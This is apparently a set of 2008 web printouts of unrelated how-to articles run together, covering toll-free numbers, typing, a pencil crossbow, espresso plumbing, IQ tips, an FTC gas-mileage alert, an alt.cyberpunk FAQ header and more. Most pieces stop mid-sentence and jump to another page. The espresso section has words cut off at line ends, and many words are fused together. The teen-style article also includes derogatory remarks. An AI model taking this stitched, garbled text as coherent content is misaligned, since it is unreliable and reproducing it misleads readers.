current MOSs (Military Oc-cupational Specialties) available. The list of jobs change to meet the demand.

How To Get an 800 Number | How To Do Things.com http://www.howtodothings.com/business/how-to-get-an-800-number

1 2 13/4/2008 10:17




By Tracey Parker

How To Get an 800 Number

We have all called an 800 number at some point to reach a business, to find out more information

about a product or service or to follow up regarding an online sale that we recently completed. Toll

free numbers originated in the 1970's to satisfy an internal need that AT&T had, but over the past 30

years, they have grown into a mainstream way to perform business functions, offering numerous

benefits to both small and large businesses.

A toll free number can start with 800, 866, 888 or 877 prefixes, and there is a reserve list of prefixes

to use if needed by the phone companies, should their current list of available toll free numbers

become completely utilized. An 800 toll free number is a phone service that charges the party being

called instead of the caller. When the caller dials a toll free number, the call is routed through a

switchboard and then to the designated business, charging the business based upon the caller's


There are a number of reasons that small and large businesses use 800 numbers:

Customer service. Businesses can provide a universal access line for consumers and customers

to call without a charge.


Assistance. Provide a toll free technical support line for callers to receive assistance on a

company's products or services.


Marketing. Customizing the toll free number to represent their business name or marketing

slogan, also called a vanity number. It has also been shown that having a toll free number can

improve the response rates for direct marketing efforts to consumers.


Portability. Businesses can take 800 numbers with them if they move locations within the same

city, nationally or internationally.


Image. An 800 number can make your small business appear larger than it is. It can take down

the geographical barriers of your physical location, making it easier to tap into other markets

domestically and internationally.


Growth. 800 numbers offer businesses the ability to expand their marketing costs as their

business grows; the more callers you have as you expand, the higher the costs will be. This

option makes a toll free number both attractive and affordable for small businesses to leverage.


In order to add an 800 number for your business, you simply need to locate a service provider. You

can start your search with your current telephone provider as well as by doing an online general

search. 800 number service providers vary based upon their services, often offering selections that

will grow with your business needs. The costs will vary between service toll free providers, with plans

between $0.05-0.25 per minute. Some toll free number companies will offer an additional monthly

rate in addition to these charges for their added benefits and services. While there is a charge for an

800 number, most businesses include this charge as a part of their overall marketing budget.

The great thing about a toll free number is that it can integrate into your current telephone plan, so

that you don't have the added expense of installing additional phone lines for your business.

Depending on the toll free number service provider, you will have the option to forward your 800

number calls to your business line or to your cell phone, making it easy to manage incoming callers.

Also, you can have as many callers to the toll free number as your current telephone system will

manage at one time.

No matter whether your business is small or large, an 800 number is an excellent strategy to build

customer relationships, to act as a global business and to increase sales.


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Learn How To Type http://www.knowledgehound.com/khhow2s/how_to_type.htm

1 3 18/4/2008 11:28

Learn How To Type

A Guide To Typing BasicsIncrease Your Keyboard Proficiency!

Google Knowledge



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One of the most common requests that we get at Knowledge Hound is for a free typing tutorial thatdoesn't require plugins, Java, downloads orregistration. With that in mind, we've written this short,basic guide to get you started on the road to keyboardproficiency.

First, gently rest your left pinky finger on the "A" key and your rightpinky on the ":" key.Rest your other fingers (except thumbs) on the next

closest keys. In other words, for your left hand, the ringfinger goes on "S", the middle finger on "D" and theforefinger on "F". For your right hand, the ring fingerrests on "L", the middle finger on "K" and the forefingeron "J".

Your thumbs should rest on the space bar (that long,thin key at the bottom of your keyboard). The letters "G"and "H" should be showing, untouched, at the center ofthe keyboard. This is your resting or default fingerposition. Whenever a finger isn't typing another character, it should return to its default position. It isn'tnecessary for a finger to actually touch its default key,but it should at least return to a position above thedefault key.

Many keyboards have a raised area on the "F" and "J"

Ads by GoogleHow to Make a Small Crossbow out of Household Items - wikiHow http://www.wikihow.com/Make-a-Small-Crossbow-out-of-Household-...

1 3 20/4/2008 3:05


How to Make a Small Crossbow out of HouseholdItemsYou can probably build your very own mini crossbow without getting up from your desk.

No knives, wood, electric appliances or any other expensive equipment are needed. All you need are some basic officesupplies, ten minutes, and these instructions.

StepsLine up two of the pencils parallel to each other and secure them with tape, leaving atleast a centimeter untaped at both ends in order to leave a space for the rubber band later. Repeat for the other two pencils.


Create a cross that looks like a lowercase "t" with the two pairs of pencils. Secure them inthat position with either tape (electric tape works best), rubber bands, or glue.


Unscrew the tip of a cheap or useless pen. Unscrew the other side of the pen, and then

take out all of the inner mechanisms. (Save the ink cartridge because that will be used as the ammo later.) After doingthat, you should end up with a hollow tube.


Secure the tube to the vertical side of the cross with tape.4.

Stretch a rubber band horizontally across the crossbow, anchoring it between the twopencils and going over the pen in the middle.


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How to Give a Killer Evaluation - Lifehack.org http://www.lifehack.org/articles/management/how-to-give-a-killer-eva...

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How to Give a Killer Evaluation

Ever gone into a performance review, had to deliver a speech or make a sales pitch and become more concerned about what the reviewer was going to say or write than what was in the presentation? It can be like going to the dentist for a root canal. This is a tough area, but it can be even more difficult for whoever is doing the evaluation.

A badly done evaluation can cause the following undesirable outcomes:

the person quits, leaves, walks out or throws coffee in your face.the review becomes an demotivator for future presentations.a friend becomes an enemy. An evaluation reflects on the evaluator as much as it does the person who is receiving it.

A good or great evaluation should do the following:

inspire the person receiving it to new heights.give the recipient specific information that can be used constructively.

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How to Beat a Big Daddy - Mahalo http://www.mahalo.com/How_to_Beat_a_Big_Daddy

1 3 19/4/2008 2:48

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How to Beat a Big Daddy

Guide Note: If you're going to get the most out of BioShock, you'll need to know How to Beat a Big Daddy

. This guide will get you familiar with a few strategies and tactics for defeating these lumbering juggernauts.

Table of Contents:

Introduction: How to Beat a Big DaddyWhat You'll NeedMethod 1: Shock is Your FriendMethod 2: Use the WaterMethod 3: Telekinesis is Also Your FriendMethod 3: Daddy vs. DaddyMethod 5: Hack Gun Turrets

Introduction: How to Beat a Big Daddy

The Big Daddy is easily the most menacing thing about BioShock. They have thick armor, a drill-arm, super speed, more health than you, and are extremely adaptive. You'll burn through tons of ammo and Eve, and they'll probably still kill you. This is fair though, since they guard Little Sisters, the keepers of ADAM - your means of acquiring new powers in the game. There is no one "right" way to defeat them, but read on to discover a few of the more tried-and-true Big Daddy hunting tactics.

What You'll Need:

Since you might (probably will) die, you should stock up on expensive powerful ammunition for thefight.


Recommended Ammo:Armor Piercing Rounds.These come for the machine gun as well as the handgun. It helps to have a clip or two of each on hand when going into the fray.


Electric Buck. This is for the shotgun, and packs quite the wallop.2.


Bring lots and lots of health. 5+ health shots is a good amount, although more can't hurt. Remember, twogood smacks and you dead.


General Tips

When firing at the Big Daddy, it's best to use the environment against him. Translation: run away and hide, run around pillars, go up/down stairs, and in general just put lots of distance and obstruction between you and him.


Then turn around and shoot him when he's vulnerable.2.It's a bad idea to be too far away from the Big Daddy when they charge, since they'll gain velocity and power with distance. Try and side-step his charge from fairly close, which if effective will give you a free shot to his hind quarters.


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Cheap espresso plumbing http://biobug.org/coffee/giotto/plumbing/

1 2 19/4/2008 4:10

Navigate: Biobug.org > Coffee > Giotto > Plumbing Contact me

When I built my new espresso bar, I decided that it was time to plumb in my slightly modified Giotto.I looked at an espresso plumbing kit, but wasn't convinced that I needed a $100 kit with a $50 water solenoid before the pump inlet. The solenoid in the kit is high quality - the same one that's behind the 9 bar pump in my machine. At the houe water line, I see all of 30 psi(about 2 bar) or so, making it a bit over-spec'd. After some thought, I wondered if I could use the same water solenoid that's used on a refridgerator.I picked up one off ebay for about $12 plus shipping, and let it sit on my desk until I was ready. Today, it's worked flawlessly for several months, so I think I can declare it a success.

Water feeds from the inlet valve (yes it's cold oleft.) to the solenoid. From there, it feeds the pupump feeds the machine.The solenoid keeps normal water pressure fromthe espresso machine constantly leak. Without machine will drip continally. If you don't have your drip tray, it will lead to disaster.To simplify wiring, I mounted a junction box incabinet and ran armored wire to my pump. Insibox, the solenoid is wired to the same relay opecircuit as the pump. Any time the pump turns osolenoid is activated.All the hoses feed to the next cabinet, where thup to the espresso machine. The drain line is coto a simple drain that I added to my drip tray wslightly modded brass fittings.

The solenoid is the blue and red fixture in the pSearching for 'GE solenoid' should turn up a simon ebay. (Most appliance shops will have themtoo.)The solenoid accepts 1/4" npt input, and has twIt accepts 120v, so it's just a matter of wiring itparallel with the pump. The ice maker side is ramore intermittent use to keep costs down, so doto supply the machine - it will probably burn ouover-used.The water dispenser side has a better solenoid, requires a bit of adaptation to work. I added a l5/16" poly hose from the dispenser side to a 5/11/4" compression adapter. The 1/4" line connecadapter to a guest type fitting (push in) on the p

My original how-to on adding an external pump to the giotto is here.

Last Modified 03/17/08 02:37

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Get Smart: How to Boost your IQ by 10 points at Ririan Project http://ririanproject.com/2007/10/10/get-smart-how-to-boost-your-iq-b...

1 10 19/4/2008 3:03

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Get Smart: How to Boost your IQ by 10 points

“It is not enough to have a good mind; the main thing is to use it well.”

- Rene Descartes

A person’s IQ was thought to be a fixed commodity largely determined by genetics. But is your IQ really set instone or can you cheat a few extra points? Recent hints suggest that a very basic brain function called workingmemory might underlie our general intelligence, opening up the intriguing possibility that if you improve yourworking memory, you could boost your IQ too.

Genetics determines a lot and so does the early gestation period. On top of that, there is a few percent that can be improved by training. So if what you want is results, and not an argument about the definition of intelligence, try some of the following tips and boost your brain power.

Activate your Brain & IQLab proven to amplify IQ, brain functions & intelligence. It's easy www.GetiMusic.com

Memory SkillsImprove your memory skills using natural techniques youcantbeatme.com

Maximize Visual ThinkingDigitize Your Mind. Create Visual Mind Maps of Files, Ideas, & Morewww.TheBrain.com

Memory ImprovementLearn How to Unleas The Power Of Your Mind in 2 Days Guaranteed!www.SilvaLifeSystem.com

Change Your Appearance From Emo to Preppy - wikiHow http://www.wikihow.com/Change-Your-Appearance-From-Emo-to-Preppy

1 3 19/4/2008 2:53




Change Your Appearance From Emo to PreppyThis article needs to be converted to wikiHow format as specified by the Writer's Guide.You can help by editing it now and then removing this notice. Notice added on 2007-12-19.

Emo girls and preppy girlsare incredibly different. They have very few similarities-they look different, act differently, and even think differently. That's whychanging from Emo to Prep can be difficult. If you're stuck and have no idea where to begin, this is the article for you. Readon...

Steps before you beginThink about it carefully. Do you really want to be a prep? Do you want to change your whole look? Do you want to changeyour self? If no, then just stop reading.


Think -Why do I want to do this? Am I looking for a last ditch effort to be cool and popular and fit in? If so thats the wrongattitude.You should'nt force yourself to conform and fit in. You dont have to be part of a subculture to be differnt either.


If yes, then make a list of all the hobbies you do on a daily basis.3.Take out any of the ones that you think are emo. You should be left with a few that are preppy or could be preppy.4.Now make a list of all the hobbies you think are preppy. For instance, reading, debating, studying, volleyball, shopping.5.Now pick about 10 that you wouldn't mind doing often or everyday.6.Smile and start doing those.7.

The Attitude1. Try to be bright and bubbly. This is most definitely an essential step in becoming a preppy girl. It's difficult to change fromEmoto bright and bubbly, but if you skip this step, the rest is pointless. . Preppy girls do not think about the end of the world andthings like that.which Basically means you will have to devote yourself fully to mindless mass-consumerism and treatingimportant future events (such as the end of the world ) as unimportant. The "I dont care" emo attitude actually translates wellinto becoming a brainless barbie and bubbleheaded bimbo. Try to think about grades, music and activities. Keep yourselffrom talking and thinking about death and morbid subjects (this in keeping with the advice not to care about the dead anddying)

2. Get better at your vocabulary and use proper grammar. Get good grades as much as possible. Study hard but don'tcomplain. If you act like it's boring you are not a prep. Have fun with it.Of course you might be called a ner then wouldntyou??? after all isnt shopping "like" way more fun? Don't just waste your time on Halo.

3. Be polite.Preps are generally polite people, and so this is an important step. Practice your basics. --say "Please" and "Thank you", opendoors for people, let people sit next to you on the bus, and don't be rude. Help others if they are in need. There are otherthings you should think about, too. But don't worry about it too much. Just act like you would like to be treated. Don't say rudethings to anyone.

4. Be classy.Remember, Preps are the ones who are in Ivy Leauge schools. To be in one of those you have to be classy. Don't slouch.Always keep your head up high and smile. Also, don't swear. That is rude (see above be polite) and preps are not rude. If youfeel the need to say something, just calm down and say, that hurt!, ow!, Oh man! Remember, swearing is a habit and you canbreak habits.

5. Act social.Say "Hi" to people you pass in the halls. Make an effort to be kind to everyone, and make new friends.That is unless they arenot preps or jocks in which case you can ignore them.

The LookBefore you actually change your look, go slow. If you try to jump straight into being a prep, you will lose friends and get some

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Build a real bell-striking clock for your PC and a fire extinguisher-stri... http://www.instructables.com/id/SWXPQ1WFCHYO97C/

1 2 12/4/2008 6:48

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Build a real bell-striking clock for your PC and a fire extinguisher-striking clock.by 5Volt on Feb 18, 2008 in OFFBEAT & TECH email it!

step 2 The bell's new clapperThe support for the bell is made from Meccano. The pictures should tell it all.The bronze bell I found at a hardware store and sounds pretty nice. I unscrewed the orginal clapper and replaced with a 4mm 120mm long screw with washers and bolt.The relay is a miniature one. I removed the copper contacts from the armature and glued a thin u-shaped steel wire. A small screw and nut complete the clapper.

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How to Make a Christian Not Try to Convert an Atheist - wikiHow http://www.wikihow.com/Make-a-Christian-Not-Try-to-Convert-an-A...

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How to Make a Christian Not Try to Convert an AtheistDealing with a friend that does not know how to deal with differing beliefs can be frustrating for both yourself and the believer.Teaching them how to coexist with and even befriend people who believe differently from them will not only help yourfriendship, but also improve many other aspects of your friend's life.

StepsWhen they claim that being your friend when you are not a Christian is difficult, point out that they have befriended youeven though you were not a Christian to start with. Ask them whether they consider you more than just a conversionproject.


Talk to them about befriending people with different political, social, and intellectual beliefs. Show that many sucharguments can get just as heated and emotional as religious arguments, and yet people of different political factions arewilling to befriend each other.


Teach them to view religion intellectually, and explain to them that arguing against their religion does not equate toattacking them personally.


Show them that you disagree with them in other matters, too. Point out that there are disagreements that may not beresolved.


TipsDon't hold their trying to convert you against them. Just let it slide; consider that from their point of view, they care for yoursoul, and that a conversion attempt is ultimately an act of love (albeit a somewhat patronising one), not one of animosity.

If and when discussing religion, maintain a calm and chatty demeanor. Do not become overly emotional, angry orfrustrated.

Explain your position, but don't market it. It's important for them to know that you have a reasoning behind your decision,even if they disagree with that line of reasoning.

Don't try to avoid religion altogether, because it's nearly impossible and because it will eventually become the elephant inthe room. It is better to grow used to a healthy disagreement than to become under-exposed to it.

WarningsDo NOT try to counterconvert them. Doing that will just turn it into a long and messy argument.

Live a good life and let your life be an example that we can live a good life without being Christian.

Related wikiHowsHow to Court a Christian GirlHow to Tell Your Friends That You Are a ChristianHow to Act Like a Christian in Any CircumstanceHow to Live With Dedicated Christian ParentsHow to Live a Good Christian Life

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How to Live in a Garage - wikiHow http://www.wikihow.com/Live-in-a-Garage

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How to Live in a GarageThis article is a stub.You can help by expanding and clarifying it. Notice added on 2008-02-23.

Do you want to live on your own but are a minor? You can live in your garage or shed!

StepsAsk your parents.1.

Measure the space so you know what can fit.2.

Make sure the door and any windows have good seals on them to prevent moisture, dust, insects or other particles fromentering the space.


Shop at local flea markets to save money.4.

If possible, install a sink.5.

Put all objects in the room.6.

Go live it up!7.

TipsYou need outlets.

Have at least $50.

Put a lock on the door.

Garage sales and flea markets save you a lot of money.

Things You'll Needcotsinkother furnituremini fridge

Related wikiHowsHow to Re Do Your Room when You Become a TeenagerHow to Cover Your Room With PostersHow to Decorate Your DeskHow to Organize a Small Office/Guest Room

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Good, Better, Best: How to Improve Gas Mileage http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt064.shtm

1 1 19/4/2008 3:11

Federal Trade CommissionProtecting America's Consumers

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Good, Better, Best: How to Improve Gas MileageWhether you are shopping for a new car or just trying to maintain the one you have, you can take some steps to get the best mileage out of your gaspurchases. The Federal Trade Commission (FTC), the nation’s consumer protection agency, offers these tips to use fuel efficiently:

On the Road: Drive More EfficientlyStay within posted speed limits. Gas mileage decreases rapidly at speeds above 60 miles per hour.

Stop aggressive driving. You can improve your gas mileage up to five percent around town if you avoid “jackrabbit” starts and stops by anticipatingtraffic conditions and driving gently.

Avoid unnecessary idling. It wastes fuel, costs you money, and pollutes the air. Turn off the engine if you anticipate a wait.

Combine errands. Several short trips taken from a cold start can use twice as much fuel as one trip covering the same distance when the engine is warm.

Use overdrive gears and cruise control when appropriate. They improve the fuel economy of your car when you’re driving on a highway.

Remove excess weight from the trunk. An extra 100 pounds in the trunk can reduce a typical car’s fuel economy by up to two percent.

Avoid packing items on top of your car. A loaded roof rack or carrier creates wind resistance and can decrease fuel economy by five percent.

At the Garage: Maintain Your CarKeep your engine tuned. Tuning your engine according to your owner’s manual can increase gas mileage by an average of four percent. Increasesvary depending on a car’s condition.

Keep your tires properly inflated and aligned. It can increase gas mileage up to three percent.

Change your oil. According to the U.S. Department of Energy (DOE) and Environmental Protection Agency (EPA), you can improve your gasmileage by using the manufacturer’s recommended grade of motor oil. Motor oil that says “Energy Conserving” on the performance symbol of theAmerican Petroleum Institute contains friction-reducing additives that can improve fuel economy.

Check and replace air filters regularly. Replacing clogged filters can increase gas mileage up to ten percent.

At the Pump: Use the Octane Level You Need Your owner’s manual recommends the most effective octane level for your car. For most cars, the recommended gasoline is regular octane. In mostcases, using a higher octane gas than the manufacturer recommends offers no benefit. Unless your engine is knocking, buying higher octanegasoline is a waste of money.

In Advertising: Check Out Claims About “Gas-Saving” GadgetsBe skeptical of claims for devices that will “boost your mileage by an extra 6 miles per gallon,” “improve your fuel economy up to 26 percent,” or thelike. EPA has tested over 100 supposed gas-saving devices — including mixture “enhancers” and fuel line magnets — and found that very fewprovide any fuel economy benefits. The devices that work provide only marginal improvements. Some “gas-saving” devices may damage a car’sengine or increase exhaust emissions. For more information and a full list of tested products, check www.epa.gov/otaq/consumer.htm.

In the Showroom: Consider the AlternativesAlternative Fuel Vehicles (AFVs) operate on alternative fuels, such as methanol, ethanol, compressed natural gas, liquefied petroleum gas,electricity, and others designated by the DOE. Using these alternative fuels in vehicles may reduce harmful pollutants and exhaust emissions. FTCRules require labels on all new AFVs to give the vehicle’s estimated cruising range and general descriptive information. Find out how many miles anew AFV travels on a tank or supply of fuel because, gallon for gallon, some don’t travel as far as gasoline-powered vehicles.

Hybrid Electric Vehicles offer another option for car buyers. According to DOE and EPA, these vehicles combine the benefits of gasoline engines and electric motors and can be configured to achieve different objectives, such as improved fuel economy and increased power.

For more information on alternative fuel vehicles, call the DOE’s toll-free National Alternative Fuels Hotline, 1-800-423-1DOE, or visit DOE’s AlternativeFuels Data Center website at www.afdc.doe.gov. More information about both hybrid-electric and alternative fuel vehicles is at www.fueleconomy.gov.

For more energy saving tips for cars, visit the DOE's website.

The FTC works for the consumer to prevent fraudulent, deceptive, and unfair business practices in the marketplace and to provide information to help consumers spot, stop, and avoid them. To file a complaint or to get free information on consumer issues, visit ftc.gov or call toll-free, 1-877-FTC-HELP (1-877-382-4357); TTY: 1-866-653-4261. The FTC enters Internet, telemarketing, identity theft, and other fraud-related complaints into Consumer Sentinel,a secure online database available to hundreds of civil and criminal law enforcement agencies in the U.S. and abroad.

September 2005

FTC Consumer Alert

Last Modified: Wednesday, 13-Feb-2008 12:41:00 EST

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alt.cyberpunk Frequently Asked Questions listThere are reader questions on this

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From: [email protected] (Erich Schneider)Newsgroups: alt.cyberpunkSubject: alt.cyberpunk Frequently Asked Questions listDate: 09 Feb 1997 19:50:08 -0600Sender: [email protected]: <[email protected]>Reply-To: [email protected]: answers to frequently asked questions about "cyberpunk" artistic and social movements

Archive-name: cyberpunk-faqLast-modified: 12/18/1996

Frequently Asked Questions on alt.cyberpunkAssembled by Erich Schneider ([email protected])Posted every two weeks

This is a FAQ list for alt.cyberpunk. It is inspired by, but is not adirect descendant of, the previous unofficial FAQ, originally compiledby Andy Hawks, and later edited by Tim Oerting.

I have been an alt.cyberpunk reader since 1988, and have seen many aFAQ get asked in my time. I am dedicated to answering your questionsand keeping this document up to date and available. If you havecomments, criticisms, additions, questions, or just general invective,send to [email protected]. (I especially welcome reports of"broken links", either in the ASCII or HTML versions.) Send to thataddress as well if you would like the latest version of this document.The latest archived version is available as"ftp://rtfm.mit.edu/pub/usenet/news.answers/". There is also aversion that has been marked up with the HTML markup language, and issuitable for viewing with World Wide Web browsers like Netscape Navigator and Microsoft Explorer; the URL is"http://bush.cs.tamu.edu/~erich/alt.cp.faq.html".

A vast number of the "answers" here should be prefixed with an "in myopinion". It would be ridiculous for me to claim to be an ultimatecyberpunk authority.

(A note on filenames: files or directories listed as being availableby anonymous FTP are in the format "hostname:filename". Thus, thefilename above (for this FAQ list itself) indicates the host is"rtfm.mit.edu" and the filename is "/pub/usenet/news.answers/cyberpunk-faq".Filenames of this type will always be given in quotes, to avoidproblems with trailing periods.)

---1. What is cyberpunk, the literary movement?2. What is cyberpunk, the subculture?3. What is cyberspace? How does it relate to today's "net" and "virtual reality"?4. Cyberpunk books5. Magazines about cyberpunk and related topics6. Cyberpunk in visual media (movies and TV) What about movies based on Gibson's stories? Gibson's _Alien 3_ script?7. _Blade Runner_8. Cyberpunk music. What about Billy Idol's album?9. What is [famous person]'s email address?10. What is this "PGP" everyone is talking about?11. Agrippa: what, and where, is it?12. Other on-line resources---

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How to Assess Risk in Sexual Situations – Making Healthier Sexual C... http://sexuality.about.com/od/saferse1/ht/assessrisk.htm

1 1 19/4/2008 3:01

Updated: May 23, 2007


How To Assess Risk in Sexual SituationsFrom Cory Silverberg,Your Guide to Sexuality.FREE Newsletter. Sign Up Now!About.com Health's Disease and Condition content is reviewed by the Medical Review Board

There is no magic formula that will assess the risk of a sexual situation on a scale of 1 to 100. But here are somequestions you can ask yourself in advance of having sex that might help you assess the potential risk to yourself.There are many ways we can get hurt by sexual encounters, and many kinds of sexual risk, but keeping yourself safe from STDs is one of the most important aspects of understanding sexual risk.

Difficulty: N/A

Time Required: take time over several days and weeks

Here's How:

How can I protect myself and my partner(s) from STDs?Using condoms for penetration play is the easiest and best way to protect yourself from many STDs, butcondoms don’t provide total protection. Think about what you want to do with your partner, and then learn aboutthe STD risk for those behaviors. Maybe you’ll only stick to some sexual activities with a new partner, or maybeyou’ll only do certain things with barrier protection.


What is my level of interest and motivation?Why do you want to make this sexual move have this sexual encounter? Are you all hot and bothered forsomeone you’ve been lusting after for months? Is it out of revenge, or pity, or boredom, or curiosity? Are yougoing to have sex with an ex-partner because it’s easy, comfortable, a sure thing? Knowing your motivationwon’t necessarily change your actions, but it can be helpful.


What are my limits?How far do you imaging taking this situation. Are you looking for a relationship, a one night stand, or somethingin between. Do you know what kind of sex you will and won’t have in this situation. These limits may change,and often they do in the moment, but thinking about them before hand can give you some guidelines for yourselfgoing into the situation, and in the moment you can gauge your comfort level with changing your limits.


What do I think about the other person?Many of us choose lousy sexual partners. Sometimes we pick people who are mean to us, who make us feelbad about ourselves, and who we would never tolerate as a friend. We do this for all sorts of reasons, but in terms of risk assessment, take some time to contemplate whether this person is worthy of your sexual attention.You deserve love and sexual pleasure, and to be treated the same way you treat others. Pick your sexualpartners with that in mind.


What are some of the things that could “go wrong”?In many situations this won’t apply, and you’ll have nothing but rosy feelings. But what if the person you’relonging for is a friend of a friend. Or works with you? Or is a well known local politician? You shouldn’tnecessarily let these answers stop you from acting, but give yourself the opportunity to imagine the obstacles,as it can help you come up with ways to work around them in the future.


What will I do if things “go wrong”?This is another question most of us don’t think about at the beginning of a sexual relationship. Hopefully youhave a good friend who you can go to in times of trouble/doubt. Lots of us have family members who arecomfortable enough with sex to be there for us when we feel we’ve made a bad choice. For some people itmight be about knowing how to take time for yourself, writing in a journal, taking baths, screaming into a pillow.


Where can I get more support around making good sexual choices?If you need to know more about STDs, want to find a good counselor, or are trying to find places to meetpeople, take some time to educate yourself, find a supportive community, and build up your own private list ofresources. You’re friends will all be the beneficiaries of this work, and you’ll be amazed at how many come toyou for help once you’ve done this for yourself.


More How To's from your Guide To Sexuality

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How to Butterfly Coil a Rope - wikiHow http://www.wikihow.com/Butterfly-Coil-a-Rope

1 4 19/4/2008 2:50


How to Butterfly Coil a RopeCarrying the least amount of necessities needed when going climbing isimportant. Traveling light and fast will make it easier to climb. Learning how tocoil a rope into an easy-to-carry backpack will eliminate carrying a backpack withyou as you climb or even hike. This coil is used predominantly by mountaineersand rock climbers, though it is also a very handy and quick way to carry any longrope.

StepsDouble the rope.Find the half point of the rope and fold the entire thing evenly in half. This is done so that once the rope is coiled, you canuse the two free ends as shoulder straps. It can be time consuming, but you won't spend as much time coiling later on.You can skip doubling the rope and still follow these steps, but in the end you will have only one strap and will need toimprovise when securing it to your body.[1]


Set aside a loose end. Grab both ends of the rope and measure 1 1/2 - 2arms' length (the distance between your hands when you hold them outstraight sideways). Let this section hang loose so far, as it will be used laterto complete the coil.


Measure another full arms' length and put it on your shoulders, with yourneck in the center.


Coil the rest of the rope behind your neck. When you are holding the ropeup, one end will be the short loose end that you set aside earlier, and theother end will be the long one that needs to be coiled.


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How To Evaluate a Web Source - Basic Evaluation Checklist http://websearch.about.com/od/referencesearch/a/evaluatesource_2.htm

1 2 19/4/2008 3:07

Web Search

How to Evaluate a Web Source - Basic Evaluation ChecklistFrom Wendy Boswell,Your Guide to Web Search.FREE Newsletter. Sign Up Now!

(Continued from Page 1)

Determine Authority, Truth, and Motivation Before Citing Internet Sources

This article is in two parts; please read How To Evaluate a Web Source - Is It Worthy of a Citation? first to understand why you should be wary of citing any old site on the Web. Here is a basic Web source evaluation checklist that you can use to determine if an Internet source is credible enough for an academic or research paper citation.

Who’s In Charge? Determine AuthorityDetermining the authority of any particular site is especially vital if you’re planning on using it as a source for anacademic paper or research project. Ask yourself these questions about the website in question:

Is it absolutely clear which company or organization is responsible for the information on the site?Is there a link to a page describing what the company or organization does and the people who are involved (an“About Us” page)?Is there a valid way of making sure the company or organization is legit – meaning, is this a real place that hasreal contact information (email only is not enough)?

If you answered “no” to any of these questions, most likely this is not a source you’re going to want to includein your bibliography.Let’s move on to the next level of criteria, which is judging the truthfulness of the information presented.

Are You Telling Me The Truth? Determine AccuracyEventually while you're on the Web, you will run into information that is not entirely true. In addition to determiningthe authority of a site, you also need to figure out if it’s presenting accurate information. Here are a few questions to ask yourself:

Can I easily figure out who wrote the information?Are all factual claims clearly substantiated, that is, are there cited (linked) sources?Are there any glaring grammatical and spelling errors? This could indicate that the content is not credible.How long ago was the page updated? Is there a date stamp on the article somewhere? You’ll need this especiallyif you’re using MLA-style citation.Can you verify the expertise of the author? Are the writer’s qualifications clearly stated somewhere on the site?

Once again, if you’re not satisfied with the answers to these questions, then you’re going to want to find another Web source. The next step in evaluating a site’s credibility is impartiality, or figuring out what’s behind the message.

Are You Selling Me Something? Determine MotivationSay for instance you’re researching power motor accidents. Information from the power motor industry would notnecessarily be the most neutral of information sources. So in order to find a non-biased information source, you’llneed to determine neutrality. Ask yourself these questions:

Is there an overwhelming bias in the information? Does the writing seem fair and balanced? Or is the writing overly slanted towards a particular point of view?Is the URL appropriate to the content? You should be able to figure out from the site address who the site belongsto, since most organizations and businesses put their name in the URL. This is a good way to determine quickly ifthe site is legit for your purposes; for example, if you’re researching mad cow disease you probably don’t want toget information from the Beef Farmers of America.Are the ads clearly separated from the content?

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BBC NEWS | Magazine | A step-by-step guide to charisma http://news.bbc.co.uk/1/hi/magazine/4579681.stm

1 5 10/4/2008 7:04

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General: Open body posture, hands away from face when talking, stand up straight, relax, hands apart with palms forwards or upwardsTo an individual: Let people know they matter and you enjoy being around them, develop a genuine smile, nod when they talk, briefly touch them on the upper arm, and maintain eye contactTo a group: Be comfortable as leader, move around to appear enthusiastic, lean slightly forward and look at all parts of the groupMessage: Move beyond status quo and make a difference, be controversial, new, simple to understand, counter-intuitiveSpeech: Be clear, fluent, forceful and articulate, evokeimagery, use an upbeat tempo, occasionally slow for tension or emphasis

SOURCE: Prof Richard Wiseman

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A step-by-step guide to charismaBy Tom Geoghegan BBC News Magazine

Scientists claim to have found the secret to that magical quality, charisma, and they say it can be learnt. But before you enrol for classes, don't think it will get you the job of your dreams.

Willy Loman in Arthur Miller's Death of a Salesman is deluded in believing that charisma, or being "well-liked" as he calls it, is more important than ability in making a person a success.

His philosophy is exposed as flawed but he did have half a point. After all, most of the greatest leaders in history possessed a star quality that drew others to them.

Churchill, Napoleon and Martin Luther King had a magnetism which is often easier to identify than it is to explain.

Until now.

Researchers say having aninfectious personality induces others to copy your body language and facial expressions.

The study, led by British Professor Richard Wiseman, involved more than 200 people taking part in FameLab, a national competition to find the new "faces of science". The ones who scored highest in a questionnaire about how much they seem to transmit their emotions to others also progressed the furthest in the competition, when they used their personalities to impress a panel of judges.

"When you see someone else who has charisma, without realising it, you're mimicking their posture and their facial expressions," says Professor Wiseman, a psychologist. "An obvious example is when someone smiles at you and you smile back. And how you hold yourself influences your emotions."

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How to Go Backpacking - Mahalo http://www.mahalo.com/How_to_Go_Backpacking

1 8 19/4/2008 2:27

How to Go BackpackingGuide Note:Backpacking allows you to enjoy the outdoors and get some great exercise at the same time.

How to Go Backpackingwill walk you through choosing a great destination and putting together all the equipment you need for your next backpacking excursion. Table of Contents:

IntroductionStep 1: Choose Your DestinationStep 2: Pick a TrailStep 3: Buy a BackpackStep 4: Select Your GearStep 5: Safety PlanStep 6: Learn the LawResources

by Diana


Backpackingis one of the healthiest and least expensive outdoor activities you can enjoy. For some people, it becomes a wayof life. Before you plan a trip, you should check with your doctor to make sure you can handle some of thephysical demands of backpacking. Once you get the go ahead, you can start preparing to see the best locations.Whether you’re backpacking through Europe or just getting away for the day, the following plan will help set youon your way.

Step 1: Choose Your Destination

Choose a location. (Photo by Fran Priestley)

Before you can plan anything, you need to choose your location. Have you always dreamed of backpacking through a national park for a week? Or, are you thinking of a longer excursion? Maybe just getting away for an afternoon is what you had in mind. The best way to pick your location is to research it first.

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How To Begin a Family Tree | eHow.com http://www.ehow.com/how_2260751_begin-family-tree.html

1 3 22/4/2008 4:33

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Begin a Family Tree

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How to Begin a Family TreeBy familybuddy

Rate: (2 Ratings)

Where do you even begin in researching your family tree? Hereare some simple steps to get started finding out about your ancestors.

Things You’ll Need:

spiral notebooksancestral chartsfamily group sheetstape recorder (opt.)

Start with what you know. Using first the ancestral chart,fill in everything you know, starting with you. Search online for ancestral chart to find examples. Do the same with the Family Group Sheets, one sheet for each coupleon your Ancestral Chart. Gather any photos you have of any of the people on your chart or any photos that you're

unsure of who they are.

Find out what your family knows. Take your charts and photosand talk to your siblings, parents, uncles and aunts, grandparents, cousins, etc. Use the charts and photos to help jog people's memories. Ask to make copies of any documents, family Bibles, or photos they may have. Make notes on what everyone says and add the information to your charts.

